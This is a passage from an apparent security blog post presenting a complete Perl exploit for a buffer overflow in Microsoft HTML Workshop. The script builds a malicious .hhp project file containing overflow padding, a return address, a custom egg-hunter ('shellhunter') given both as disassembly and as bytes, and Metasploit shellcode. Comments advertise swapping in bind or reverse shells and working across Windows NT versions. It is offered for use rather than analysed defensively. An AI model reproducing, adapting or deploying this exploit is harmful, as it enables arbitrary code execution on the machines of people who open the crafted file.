That’s all that you need to know that was added! Certainly, a shellhunter is a must-use in some cases for exploitation and I hope that you can implement the method for your exploits (do remember to credit me )! If you got any problems with writing your certain exploit, and need a shellhunter, don’t hesitate to contact me at skdrat<at>hotmail<.>com (MSN Messenger).

Read the exploit below, and enjoy it!

Milw0rm exploit URL: http://milw0rm.com/exploits/7727

Exploit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176

 
    #!/usr/bin/perl
    # Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit
    # -----------------------------------------------------------------
    # Discovered/Exploit by SkD                    (skdrat@hotmail.com)
    # -----------------------------------------------------------------
    #
    # This is a continuation of my new method, shellhunting.
    # The exploit is far more advanced than the Amaya's as it runs on
    # every system, partly because the shellhunter itself is very much
    # reliable and universal.
    # The shellhunter does the following tasks to find and exec.
    # shellcode:-
    #
    # 1- Searches through the whole memory of the application.
    # 2- Installs a SEH handler so on access violations it won't
    #    stop hunting for the shellcode.
    # 3- Repairs stack so a stack overflow won't occur (that is what
    #    happens when the SEH is called up, many PUSH instructions
    #    are called from the relevant modules (ntdll, etc).
    # 4- Improved speed by searching through 32 bytes at a time.
    # 5- Uses a certain address in memory to store a variable for the
    #    search.
    #
    # It is very stable and will allow any shellcode (bind/reverse shell,
    # dl/exec). It will work on ALL Windows NT versions (2k, XP, Vista).
    #
    # Yeah, I guess that's about it. Took me a few hours to figure out the
    # whole thing but nothing is impossible ;).
    #
    # Oh, I think some schools use this software :) (it's Microsoft's, right?).
    #
    # You can download the app. from Microsoft's official page:
    # ->  http://msdn.microsoft.com/en-us/library/ms669985.aspx
    #
    # If you are interested in my method and want to learn something new or
    # improve your exploitation skills then visit my team's blog at:
    # ->  http://abysssec.com
    #
    # Peace out,
    # SkD.
 
    my $hhp_data1 = "\x5B\x4F\x50\x54\x49\x4F\x4E\x53".
    "\x5D\x0D\x0A\x43\x6F\x6E\x74\x65".
    "\x6E\x74\x73\x20\x66\x69\x6C\x65".
    "\x3D\x41\x0D\x0A\x49\x6E\x64\x65".
    "\x78\x20\x66\x69\x6C\x65\x3D";
    my $hhp_data2 = "\x5B\x46\x49\x4C\x45\x53\x5D\x0D".
    "\x0A\x61\x2E\x68\x74\x6D";
    my $crlf      = "\x0d\x0a";
 
    # win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
    my $shellcode =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
    "\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x46".
    "\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x56\x42\x32\x42\x41\x41\x32".
    "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x58\x69\x69\x6c\x4b".
    "\x58\x62\x64\x65\x50\x67\x70\x47\x70\x6c\x4b\x42\x65\x45\x6c\x6e".
    "\x6b\x73\x4c\x53\x35\x73\x48\x45\x51\x4a\x4f\x6c\x4b\x70\x4f\x52".
    "\x38\x4c\x4b\x33\x6f\x55\x70\x57\x71\x6a\x4b\x61\x59\x4c\x4b\x36".
    "\x54\x6e\x6b\x53\x31\x48\x6e\x55\x61\x39\x50\x4d\x49\x4c\x6c\x4d".
    "\x54\x6b\x70\x74\x34\x66\x67\x4b\x71\x78\x4a\x56\x6d\x67\x71\x39".
    "\x52\x48\x6b\x4c\x34\x35\x6b\x62\x74\x56\x44\x57\x74\x54\x35\x6b".
    "\x55\x4e\x6b\x31\x4f\x65\x74\x67\x71\x5a\x4b\x50\x66\x6c\x4b\x56".
    "\x6c\x42\x6b\x6e\x6b\x53\x6f\x47\x6c\x67\x71\x7a\x4b\x6c\x4b\x45".
    "\x4c\x6c\x4b\x47\x71\x48\x6b\x4f\x79\x33\x6c\x44\x64\x73\x34\x49".
    "\x53\x70\x31\x6b\x70\x71\x74\x4e\x6b\x73\x70\x56\x50\x4b\x35\x49".
    "\x50\x62\x58\x66\x6c\x4c\x4b\x43\x70\x56\x6c\x4c\x4b\x50\x70\x45".
    "\x4c\x4c\x6d\x6c\x4b\x35\x38\x77\x78\x78\x6b\x67\x79\x4e\x6b\x6b".
    "\x30\x6c\x70\x57\x70\x63\x30\x33\x30\x4c\x4b\x32\x48\x67\x4c\x73".
    "\x6f\x35\x61\x48\x76\x71\x70\x56\x36\x6c\x49\x4a\x58\x6e\x63\x69".
    "\x50\x41\x6b\x56\x30\x65\x38\x6c\x30\x6f\x7a\x75\x54\x73\x6f\x31".
    "\x78\x4e\x78\x79\x6e\x6f\x7a\x36\x6e\x66\x37\x6b\x4f\x5a\x47\x52".
    "\x43\x65\x31\x30\x6c\x70\x63\x45\x50\x46";
 
    #/----------------Advanced Shellhunter Code----------------\
    #01D717DD   EB 1E            JMP SHORT 01D717FD            |
    #01D717DF   83C4 64          ADD ESP,64                    |
    #01D717E2   83C4 64          ADD ESP,64                    |
    #01D717E5   83C4 64          ADD ESP,64                    |
    #01D717E8   83C4 64          ADD ESP,64                    |
    #01D717EB   83C4 64          ADD ESP,64                    |
    #01D717EE   83C4 64          ADD ESP,64                    |
    #01D717F1   83C4 64          ADD ESP,64                    |
    #01D717F4   83C4 64          ADD ESP,64                    |
    #01D717F7   83C4 64          ADD ESP,64                    |
    #01D717FA   83C4 54          ADD ESP,54                    |
    #01D717FD   33FF             XOR EDI,EDI                   |
    #01D717FF   BA D0FAFD7F      MOV EDX,7FFDFAD0              |
    #01D71804   8B3A             MOV EDI,DWORD PTR DS:[EDX]    |
    #01D71806   EB 0E            JMP SHORT 01D71816            |
    #01D71808   58               POP EAX                       |
    #01D71809   83E8 3C          SUB EAX,3C                    |
    #01D7180C   50               PUSH EAX                      |
    #01D7180D   6A FF            PUSH -1                       |
    #01D7180F   33DB             XOR EBX,EBX                   |
    #01D71811   64:8923          MOV DWORD PTR FS:[EBX],ESP    |
    #01D71814   EB 05            JMP SHORT 01D7181B            |
    #01D71816   E8 EDFFFFFF      CALL 01D71808                 |
    #01D7181B   B8 12121212      MOV EAX,12121212              |
    #01D71820   6BC0 02          IMUL EAX,EAX,2                |
    #01D71823   BA D0FAFD7F      MOV EDX,7FFDFAD0              |
    #01D71828   83C7 20          ADD EDI,20                    |
    #01D7182B   893A             MOV DWORD PTR DS:[EDX],EDI    |
    #01D7182D   3907             CMP DWORD PTR DS:[EDI],EAX    |
    #01D7182F  ^75 F7            JNZ SHORT 01D71828            |
    #01D71831   83C7 04          ADD EDI,4                     |
    #01D71834   6BC0 02          IMUL EAX,EAX,2                |
    #01D71837   3907             CMP DWORD PTR DS:[EDI],EAX    |
    #01D71839  ^75 E0            JNZ SHORT 01D7181B            |
    #01D7183B   83C7 04          ADD EDI,4                     |
    #01D7183E   B8 42424242      MOV EAX,42424242              |
    #01D71843   3907             CMP DWORD PTR DS:[EDI],EAX    |
    #01D71845  ^75 D4            JNZ SHORT 01D7181B            |
    #01D71847   83C7 04          ADD EDI,4                     |
    #01D7184A   FFE7             JMP EDI                       |
    #\-----------------------End of Code----------------------/
 
    my $shellhunter = "\xeb\x1e".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x54".
    "\x33\xff".
    "\xba\xd0\xfa\xfd\x7f".
    "\x8b\x3a".
    "\xeb\x0e".
    "\x58".
    "\x83\xe8\x3c".
    "\x50".
    "\x6a\xff".
    "\x33\xdb".
    "\x64\x89\x23".
    "\xeb\x05".
    "\xe8\xed\xff\xff\xff".
    "\xb8\x12\x12\x12\x12".
    "\x6b\xc0\x02".
    "\xba\xd0\xfa\xfd\x7f".
    "\x83\xc7\x20".
    "\x89\x3a".
    "\x39\x07".
    "\x75\xf7".
    "\x83\xc7\x04".
    "\x6b\xc0\x02".
    "\x39\x07".
    "\x75\xe0".
    "\x83\xc7\x04".
    "\xb8\x42\x42\x42\x42".
    "\x39\x07".
    "\x75\xd4".
    "\x83\xc7\x04".
    "\xff\xe7";
    my $lookout1 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42" x 64;
    my $lookout2 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42" x 64;
    my $lookout3 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42" x 64;
    my $lookout4 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42\x42" x 64;
    my $len = 280 - (length($shellhunter) + 55);
    my $overflow1 = "\x41" x $len;
    my $overflow2 = "\x41" x 55;
    my $overflow3 = "\x42" x 256;
    my $ret = "\x93\x1f\x40\x00"; #0x00401f93   CALL EDI [hhw.exe]
 
    open(my $hhpprj_file, "> s.hhp");
    print $hhpprj_file $hhp_data1.
    $overflow1.$shellhunter.$overflow2.$ret.
    $crlf.$crlf.
    $hhp_data2.
    $overflow3.$lookout1.$lookout2.$lookout3.$lookout4.$shellcode.$overflow3.
    $crlf;
    close $hhpprj_file;